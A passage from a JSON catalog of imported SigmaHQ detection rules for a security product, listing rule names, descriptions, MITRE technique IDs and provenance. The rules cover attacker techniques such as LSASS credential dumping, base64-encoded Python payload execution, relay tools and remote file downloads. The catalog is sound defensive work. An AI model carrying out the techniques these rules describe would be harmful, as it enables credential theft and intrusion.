"rules/windows/process_creation/proc_creation_win_xwizard_runwizard_com_object_exec.yml" } }, { "id": "sigmahq-sigma-53d8d3e1-ca33-4012-adf3-e05a4d652e34", "type": "detection", "name": "Process Memory Dump Via Dotnet-Dump", "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-memory-dump-via-dotnet-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dotnetdump_memory_dump.yml" } }, { "id": "sigmahq-sigma-53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", "type": "detection", "name": "Query Usage To Exfil Data", "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/query-usage-to-exfil-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" } }, { "id": "sigmahq-sigma-54127bd4-f541-4ac3-afdb-ea073f63f692", "type": "detection", "name": "Potential Persistence Via Notepad++ Plugins", "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". This could indicate possible persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-notepad-plugins.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54127bd4-f541-4ac3-afdb-ea073f63f692", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" } }, { "id": "sigmahq-sigma-542b9912-c01f-4e3f-89a8-014c48cdca7d", "type": "detection", "name": "Azure Device No Longer Managed or Compliant", "description": "Identifies when a device in azure is no longer managed or compliant", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/azure-device-no-longer-managed-or-compliant.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "542b9912-c01f-4e3f-89a8-014c48cdca7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml" } }, { "id": "sigmahq-sigma-545a5da6-f103-4919-a519-e9aec1026ee4", "type": "detection", "name": "Microsoft Malware Protection Engine Crash", "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1211", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-malware-protection-engine-crash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "545a5da6-f103-4919-a519-e9aec1026ee4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/application_error/win_application_error_msmpeng_crash.yml" } }, { "id": "sigmahq-sigma-5468045b-4fcc-4d1a-973c-c9c9578edacb", "type": "detection", "name": "Raw Paste Service Access", "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1102.001", "T1102.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/raw-paste-service-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_raw_paste_service_access.yml" } }, { "id": "sigmahq-sigma-54773c5f-f1cc-4703-9126-2f797d96a69d", "type": "detection", "name": "PUA - Advanced Port Scanner Execution", "description": "Detects the use of Advanced Port Scanner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advanced-port-scanner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54773c5f-f1cc-4703-9126-2f797d96a69d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml" } }, { "id": "sigmahq-sigma-54786ddc-5b8a-11ed-9b6a-0242ac120002", "type": "detection", "name": "Suspicious Ping/Del Command Combination", "description": "Detects a method often used by ransomware. 
Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ping-del-command-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml" } }, { "id": "sigmahq-sigma-547dfc53-ebf6-4afe-8d2e-793d9574975d", "type": "detection", "name": "OpenCanary - REDIS Action Command Attempt", "description": "Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-redis-action-command-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "547dfc53-ebf6-4afe-8d2e-793d9574975d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/application/opencanary/opencanary_redis_command.yml" } }, { "id": "sigmahq-sigma-5496ff55-42ec-4369-81cb-00f417029e25", "type": "detection", "name": "Multifactor Authentication Interrupted", "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/multifactor-authentication-interrupted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5496ff55-42ec-4369-81cb-00f417029e25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml" } }, { "id": "sigmahq-sigma-5498fc09-adc6-4804-b9d9-5cca1f0b8760", "type": "detection", "name": "OpenCanary - HTTPPROXY Login Attempt", "description": "Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-httpproxy-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "5498fc09-adc6-4804-b9d9-5cca1f0b8760", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_httpproxy_login_attempt.yml" } }, { "id": "sigmahq-sigma-54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "type": "detection", "name": "AWS EC2 VM Export Failure", "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1005", "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-ec2-vm-export-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml" } }, { "id": "sigmahq-sigma-54f0434b-726f-48a1-b2aa-067df14516e4", "type": "detection", "name": "Password Protected ZIP File Opened (Suspicious Filenames)", "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-protected-zip-file-opened-suspicious-filenames.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54f0434b-726f-48a1-b2aa-067df14516e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" } }, { "id": "sigmahq-sigma-550bbb84-ce5d-4e61-84ad-e590f0024dcd", "type": "detection", "name": "File Encryption Using Gpg4win", "description": "Detects usage of Gpg4win to encrypt files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-encryption-using-gpg4win.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "550bbb84-ce5d-4e61-84ad-e590f0024dcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml" } }, { "id": "sigmahq-sigma-550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "type": "detection", 
"name": "ProxyLogon MSExchange OabVirtualDirectory", "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/proxylogon-msexchange-oabvirtualdirectory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" } }, { "id": "sigmahq-sigma-5513deaf-f49a-46c2-a6c8-3f111b5cb453", "type": "detection", "name": "SQL Injection Strings In URI", "description": "Detects potential SQL injection attempts via GET requests in access logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sql-injection-strings-in-uri.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" } }, { "id": "sigmahq-sigma-551d9c1f-816c-445b-a7a6-7a3864720d60", "type": "detection", "name": "Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp", "description": "Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the \"ActivateMicrosoftApp\" Excel DCOM object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-excel-exe-dcom-lateral-movement-via-activatemicrosoftapp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "551d9c1f-816c-445b-a7a6-7a3864720d60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml" } }, { "id": "sigmahq-sigma-552b6b65-df37-4d3e-a258-f2fc4771ae54", "type": "detection", "name": "Potential Antivirus Software DLL Sideloading", "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-antivirus-software-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_antivirus.yml" } }, { "id": "sigmahq-sigma-554601fb-9b71-4bcc-abf4-21a611be4fde", "type": "detection", "name": "Suspicious Recursive Takeown", "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-recursive-takeown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" } }, { "id": "sigmahq-sigma-555155a2-03bf-4fe7-af74-d176b3fdbe16", "type": "detection", "name": "Driver Added To Disallowed Images In HVCI - Registry", "description": "Detects changes to the \"HVCIDisallowedImages\" registry value to potentially add a driver to the list, in order to prevent it from loading.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/driver-added-to-disallowed-images-in-hvci-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "555155a2-03bf-4fe7-af74-d176b3fdbe16", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml" } }, { "id": "sigmahq-sigma-55695bc0-c8cf-461f-a379-2535f563c854", "type": "detection", "name": "Applications That Are Using ROPC Authentication Flow", "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/applications-that-are-using-ropc-authentication-flow.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55695bc0-c8cf-461f-a379-2535f563c854", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml" } }, { "id": "sigmahq-sigma-5588576c-5898-4fac-bcdd-7475a60e8f43", "type": "detection", "name": "Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN 
Spoofing - Network", "description": "Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\nThe pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\nAttackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\nIt is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\nto spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-indicating-kerberos-coercion-via-dns-object-spn-spoofing-ne.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5588576c-5898-4fac-bcdd-7475a60e8f43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml" } }, { "id": "sigmahq-sigma-5589ab4f-a767-433c-961d-c91f3f704db1", "type": "detection", "name": "Potential SMB Relay Attack Tool Execution", "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/potential-smb-relay-attack-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5589ab4f-a767-433c-961d-c91f3f704db1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml" } }, { "id": "sigmahq-sigma-5594e67a-7f92-4a04-b65d-1a42fd824a60", "type": "detection", "name": "MSI Installation From Web", "description": "Detects installation of a remote msi file from web.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msi-installation-from-web.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml" } }, { "id": "sigmahq-sigma-55c925c1-7195-426b-a136-a9396800e29b", "type": "detection", "name": "Potential Suspicious Windows Feature Enabled", "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-windows-feature-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55c925c1-7195-426b-a136-a9396800e29b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml" } }, { "id": "sigmahq-sigma-55e29995-75e7-451a-bef0-6225e2f13597", "type": "detection", "name": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-via-lsass-silentprocessexit-technique.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55e29995-75e7-451a-bef0-6225e2f13597", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" } }, { "id": 
"sigmahq-sigma-55e862a8-dd9c-4651-807a-f21fcad56716", "type": "detection", "name": "Python One-Liners with Base64 Decoding - Linux", "description": "Detects the use of Python's base64 decoding functions in command line executions on Linux systems.\nMalicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.006", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-one-liners-with-base64-decoding-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55e862a8-dd9c-4651-807a-f21fcad56716", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_base64_encoded_execution.yml" } }, { "id": "sigmahq-sigma-55f0a3a1-846e-40eb-8273-677371b8d912", "type": "detection", "name": "Outlook EnableUnsafeClientMailRules Setting Enabled", "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-enableunsafeclientmailrules-setting-enabled.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55f0a3a1-846e-40eb-8273-677371b8d912", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" } }, { "id": "sigmahq-sigma-56321594-9087-49d9-bf10-524fe8479452", "type": "detection", "name": "Potential Persistence Via Netsh Helper DLL", "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-netsh-helper-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "56321594-9087-49d9-bf10-524fe8479452", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" } }, { "id": "sigmahq-sigma-56454143-524f-49fb-b1c6-3fb8b1ad41fb", "type": "detection", "name": "Suspicious File Download From File Sharing Domain Via Curl.EXE", "description": "Detects potentially suspicious file download from file sharing domains using curl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
